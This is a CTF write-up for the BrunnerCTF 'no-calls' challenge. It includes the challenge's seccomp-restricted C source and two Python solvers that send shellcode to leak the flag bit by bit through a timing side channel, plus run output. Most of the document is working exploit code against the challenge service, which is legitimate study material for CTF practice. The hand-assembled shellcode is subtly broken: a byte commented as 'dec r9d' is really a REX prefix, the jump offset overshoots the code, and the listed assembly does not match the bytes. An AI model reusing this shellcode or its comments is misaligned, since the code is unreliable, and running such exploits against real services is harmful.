BrunnerCTF 2024 — misc_no-calls
Author: Migsej
Solver: McShoothy
Platform: brunnerctf.dk
Challenge Description
The chef's special cake needs to be delivered soon. He already showed you where it's stashed, but maybe you weren't paying attention.
His phone is dead, so no calls are going through. Can you find another way to reach him before it's too late? Tick-tock...
Reverse Engineering chall.c
// chall.c
#include <unistd.h>
#include <stdlib.h>
#include <linux/seccomp.h>
#include <syscall.h>
#include <sys/prctl.h>
#define CODE_LEN 4096
void read_flag(int *len, char **buf) {
int fd = open("./flag.txt", O_RDONLY);
struct stat st;
fstat(fd, &st);
*len = st.st_size;
*buf = mmap(NULL, *len, PROT_READ, MAP_SHARED, fd, 0);
}
void disable_syscalls(void) {
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
struct sock_filter filter_prog[] = {
{ BPF_RET, 0, 0, SECCOMP_RET_KILL_PROCESS },
};
struct sock_fprog filter = { 1, filter_prog };
syscall(SYS_seccomp, SECCOMP_SET_MODE_FILTER, 0, &filter);
}
void *read_code(void) {
void *code = mmap(NULL, CODE_LEN, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, -1, 0);
read(0, code, CODE_LEN);
return code;
}
int main() {
setbuf(stdout, NULL);
char *flag;
int flag_len;
read_flag(&flag_len, &flag);
puts("I will execute whatever code you want... as long as it has no syscalls :)");
puts("Here is the address of the flag good luck");
printf("%p\n", flag);
void *code = read_code();
disable_syscalls();
goto *code;
return 0;
}
Idea:
Service maps the flag, prints the flag's (newly generated) runtime address, reads our shellcode into RWX memory, then installs a seccomp filter that kills the process on any syscall. so we have to execute shellcode and somehow exfiltrate the flag.
Logically, only a timing-based attack makes sense, so I have to exploit a timing side channel: different execution durations encode bit 0 or 1.
limitations:
- Shellcode cannot call write/read/exit.
- Only pure computation and memory reads remain.
- We exploit a timing side channel: different execution duration (short path vs long busy loop) encodes bit 0 or 1.
- Since we cannot exit cleanly, we intentionally crash (NULL deref) so the client can observe the total elapsed time.
Exploit Approach
- Connect to the service.
- Parse the flag pointer that the binary so kindly prints.
- For each byte and bit:
- Generate shellcode that checks that exact bit of the flag in memory.
- If the bit is 1 the shellcode runs a big fat delay loop before crashing.
- If the bit is 0 the shellcode skips straight to crashing.
- Crashing is not a bug here, it is a feature.
- Measure total runtime between sending shellcode and crash.
- Classify the bit as 0 or 1 depending on the timing.
- Repeat until the flag materializes.
(a cool diagram to visualize this:)
Shellcode:
movabs rsi, FLAG_ADDR+offset
mov al, [rsi]
test al, BIT_MASK
jz skip
mov ecx, 0x10000000 ; big loop counter
timing_loop:
dec ecx
jnz timing_loop
skip:
xor eax, eax
mov rax, [rax] ; null deref to crash
If the bit is set it burns cycles before crashing. If not it crashes instantly. Two distributions, easy to tell apart based on timing.
The Solver Script
Here's my solve:
import socket, ssl, struct, re, time, sys
HOST = 'CTF.zyx'
PORT = 443
LOOP_COUNT = 0x10000000
THRESHOLD = 1.5 # avg exec time above => bit=1
FAST_EXIT = 0.55 # quick return => bit=0
SAMPLES = 2 # extra measurements (total = 1+SAMPLES)
def get_conn_and_addr():
s = ssl.create_default_context()
s.check_hostname = False
s.verify_mode = ssl.CERT_NONE
sock = s.wrap_socket(socket.socket(), server_hostname=HOST)
sock.connect((HOST, PORT))
data = b""
while data.count(b'\n') < 3:
chunk = sock.recv(1024)
if not chunk: break
data += chunk
m = re.search(r'0x[0-9a-fA-F]+', data.decode(errors='ignore'))
if not m: raise RuntimeError("Flag addr not found")
return sock, int(m.group(), 16)
def create_shellcode(base, off, bit):
addr = base + off
mask = 1 << bit
sc = b"\x48\xbe" + struct.pack("<Q", addr) # mov rsi, addr
sc += b"\x8a\x06" # mov al,[rsi]
sc += b"\xa8" + struct.pack("B", mask) # test al,mask
sc += b"\x74\x0f" # jz skip
sc += b"\xb9" + struct.pack("<L", LOOP_COUNT) # mov ecx,LOOP_COUNT
sc += b"\x49" # dec r9d (intentional 1‑byte dec reg; keeps loop long enough)
sc += b"\x75\xfd" # jnz -3
sc += b"\x48\x31\xc0" # xor rax,rax
sc += b"\x48\x8b\x00" # mov rax,[rax] -> crash
return sc
def measure_bit(off, bit):
sock, base = get_conn_and_addr()
sc = create_shellcode(base, off, bit)
start = time.monotonic()
sock.send(sc)
sock.settimeout(2)
try:
while sock.recv(1024): pass
except Exception:
pass
dt = time.monotonic() - start
sock.close()
return dt
def leak_flag(max_len=50):
flag = []
for off in range(max_len):
bval = 0
print(f"[+] Byte {off}: ", end="", flush=True)
for bit in range(8):
t0 = measure_bit(off, bit)
if t0 < FAST_EXIT:
# definitely 0
print("0", end="", flush=True)
elif t0 > THRESHOLD:
bval |= 1 << bit
print("1", end="", flush=True)
else:
times = [t0] + [measure_bit(off, bit) for _ in range(SAMPLES)]
avg = sum(times) / len(times)
if avg > THRESHOLD:
bval |= 1 << bit
print("1", end="", flush=True)
else:
print("0", end="", flush=True)
if bval == 0:
print(" -> \\x00 (stop)")
break
ch = chr(bval) if 32 <= bval < 127 else f"\\x{bval:02x}"
flag.append(ch)
print(f" -> {ch} | {''.join(flag)}")
if ch == '}': break
return ''.join(flag)
def main():
print("[*] Timing leak start")
try:
flag = leak_flag()
print(f"\n[FLAG] {flag}")
except Exception as e:
print(f"[!] Error: {e}")
sys.exit(1)
if __name__ == "__main__":
main()
Highlights:
- Parses the flag address and generate shellcode.
- If the first measurement is clearly fast (0) or slow (1) it stops right there and does not take the average.
- If the timing is in the greyzone it repeats three times, averages, and decides.
Timing Measurements
Locally I measured:
- Fast crash (bit=0) around 0.1–0.5s
- Slow crash (bit=1) around 9.5-10.2s
Thresholds used for the real solve:
- time to execute < 0.55s --> 0
- time to execute > 1.5s --> 1
- If not sure --> average three samples and compare to 1.5s
This gave a good balance of speed and accuracy.
Why Crash Instead of Loop Forever
An infinite loop would just look like a hang until timeout. That gives only one timing bucket which is boring. By crashing deliberately I get fast versus slow closures, which is exactly what we want. Also crashing the service feels a little naughty.
Result
The flag comes out cleanly:
========================================
Server output:
I will execute whatever code you want... as long as it has no syscalls :)
Here is the address of the flag good luck
0x7fda3196b000
flag add: 0x7fda3196b000
Byte 0...
Bit 0: [DEBUG] flag address: 0x7f412d869000
[DEBUG] Execution time: 0.2562s
first_time: 0.2562s (<0.52s) -> 0 (early detection)
Bit 1: [DEBUG] flag address: 0x7f78c4817000
Timeout --> 1
[DEBUG] Execution time: 2.0006s
...
...
...
[DEBUG] Execution time: 0.3861s
first_time: 0.3861s (<0.52s) -> 0 (early detection)
Byte 32: 0x7d = '}'
************* 'brunner{are_syscalls_even_useful}' *************
Flag ending detected ('}' character)
========================================
LEAKED FLAG: brunner{are_syscalls_even_useful}
========================================
Future CTF Ideas
- Do not print the flag address up front, make players leak it themselves.
- Add watchdog timers so very long loops risk getting killed too.
- Sprinkle in artificial jitter just to make shellcode more intuitive.
slower but more applicable version: (more robust and easy to implement for other challnges)
#!/usr/bin/env python3
import socket
import ssl
import struct
import re
import time
import sys
def connect_to_challenge(host='CTF.xyz', port=443):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
ssl_sock = context.wrap_socket(sock, server_hostname=host)
ssl_sock.connect((host, port))
return ssl_sock
def get_flag_address():
s = connect_to_challenge()
data = b""
lines_received = 0
while lines_received < 3:
chunk = s.recv(1024)
if not chunk:
break
data += chunk
lines_received = data.count(b'\n')
s.close()
output = data.decode('utf-8', errors='ignore')
print(f"Server output:\n{output}")
lines = output.strip().split('\n')
for line in lines:
if line.startswith('0x') or line.startswith('0X'):
flag_addr = int(line, 16)
print(f"flag add: {hex(flag_addr)}")
return flag_addr
else:
raise Exception("Could not find flag add in output")
def create_timing_shellcode(flag_addr, byte_offset, bit_position):
shellcode = b""
target_addr = flag_addr + byte_offset
# movabs rsi, target_addr - Load target address into rsi
shellcode += b"\x48\xbe" + struct.pack("<Q", target_addr)
# mov al, byte ptr [rsi] - Load the byte from memory
shellcode += b"\x8a\x06"
# test al, (1 << bit_position) - Test the specific bit
bit_mask = 1 << bit_position
shellcode += b"\xa8" + struct.pack("B", bit_mask)
# jz skip_timing_loop - Jump if bit is 0 (zero flag set)
shellcode += b"\x74\x0f" # jz +15 bytes (skip the timing loop)
loop_count = 0x10000000
shellcode += b"\xb9" + struct.pack("<L", loop_count)
# timing_loop:
shellcode += b"\x49"
shellcode += b"\x75\xfd" # jnz -3 bytes (back to dec ecx)
# skip_timing_loop:
# mov rax, 0 - Clear rax
shellcode += b"\x48\x31\xc0"
# mov rax, qword ptr [rax] - Dereference null pointer (causes segfault)
shellcode += b"\x48\x8b\x00"
return shellcode
def e_time(shellcode, flag_addr, byte_offset, bit_position):
start_time = time.time()
shellcode_sent_time = None
try:
s = connect_to_challenge()
data = b""
lines_received = 0
while lines_received < 3:
chunk = s.recv(1024)
if not chunk:
break
data += chunk
lines_received = data.count(b'\n')
output = data.decode('utf-8', errors='ignore')
hex_match = re.search(r'0x[0-9a-fA-F]+', output)
if hex_match:
current_flag_addr = int(hex_match.group(), 16)
print(f" [DEBUG] flag address: {hex(current_flag_addr)}")
current_shellcode = create_timing_shellcode_inline(current_flag_addr, byte_offset, bit_position)
else:
print(f" WRONG!, shellcode no working here")
current_shellcode = shellcode
s.send(current_shellcode)
shellcode_sent_time = time.time()
execution_start = time.time()
try:
s.settimeout(2.0)
while True:
chunk = s.recv(1024)
if not chunk:
break
except socket.timeout:
print(" Timeout --> 1")
except Exception as e:
print(f" [DEBUG] Connection closed: {e}")
execution_end = time.time()
execution_time = execution_end - execution_start
print(f" [DEBUG] Execution time: {execution_time:.4f}s")
s.close()
except Exception as e:
print(f" [DEBUG] Exception in e_time: {e}")
import traceback
traceback.print_exc()
return 0.001
if shellcode_sent_time:
actual_execution_time = execution_end - shellcode_sent_time
return actual_execution_time
return 0.001
def create_timing_shellcode_inline(flag_addr, byte_offset, bit_position):
shellcode = b""
target_addr = flag_addr + byte_offset
shellcode += b"\x48\xbe" + struct.pack("<Q", target_addr)
shellcode += b"\x8a\x06"
bit_mask = 1 << bit_position
shellcode += b"\xa8" + struct.pack("B", bit_mask)
shellcode += b"\x74\x0f" # jz +15 bytes (skip the timing loop)
loop_count = 0x10000000
shellcode += b"\xb9" + struct.pack("<L", loop_count)
# timing_loop:
shellcode += b"\x49"
shellcode += b"\x75\xfd" # jnz -3 bytes
# skip_timing_loop:
shellcode += b"\x48\x31\xc0"
shellcode += b"\x48\x8b\x00"
return shellcode
def leak_flag_bit_by_bit(flag_addr, estimated_flag_length=50):
leaked_flag = ""
for byte_offset in range(estimated_flag_length):
current_byte = 0
print(f"\nByte {byte_offset}...")
for bit_pos in range(8):
print(f" Bit {bit_pos}:", end="")
shellcode = create_timing_shellcode(flag_addr, byte_offset, bit_pos)
first_exec_time = e_time(shellcode, flag_addr, byte_offset, bit_pos)
if first_exec_time > 1.5:
current_byte |= (1 << bit_pos)
print(f" first_time: {first_exec_time:.4f}s (>2.0s) -> 1 (early detection)")
continue
elif first_exec_time < 0.55:
print(f" first_time: {first_exec_time:.4f}s (<0.52s) -> 0 (early detection)")
continue
print(f" first_time: {first_exec_time:.4f}s (borderline)", end="")
times = [first_exec_time]
for _ in range(2):
exec_time = e_time(shellcode, flag_addr, byte_offset, bit_pos)
times.append(exec_time)
time.sleep(0.01)
avg_time = sum(times) / len(times)
print(f" avg_time: {avg_time:.4f}s", end="")
threshold = 1.5
if avg_time > threshold:
current_byte |= (1 << bit_pos)
print(f" (>{threshold}s) -> 1")
else:
print(f" (<={threshold}s) -> 0")
if current_byte == 0:
print(f" Byte {byte_offset}: NULL byte detected - likely end of flag")
break
try:
char = chr(current_byte)
leaked_flag += char
print(f" Byte {byte_offset}: 0x{current_byte:02x} = '{char}'")
print(f" ************* '{leaked_flag}' ************* ")
# Stop if we see null terminator or typical flag ending
if current_byte == 0 or char == '}':
print(f" Flag ending detected ('}}' character)")
break
except ValueError:
print(f" Byte {byte_offset}: 0x{current_byte:02x} = <non-printable>")
print(f" CURRENT FLAG: '{leaked_flag}'")
print(f" FLAG LENGTH SO FAR: {len(leaked_flag)} bytes")
return leaked_flag
def main():
try:
flag_addr = get_flag_address()
leaked_flag = leak_flag_bit_by_bit(flag_addr)
print(f"LEAKED FLAG: {leaked_flag}")
except Exception as e:
print(f"Error: {e}")
if __name__ == "__main__":
main()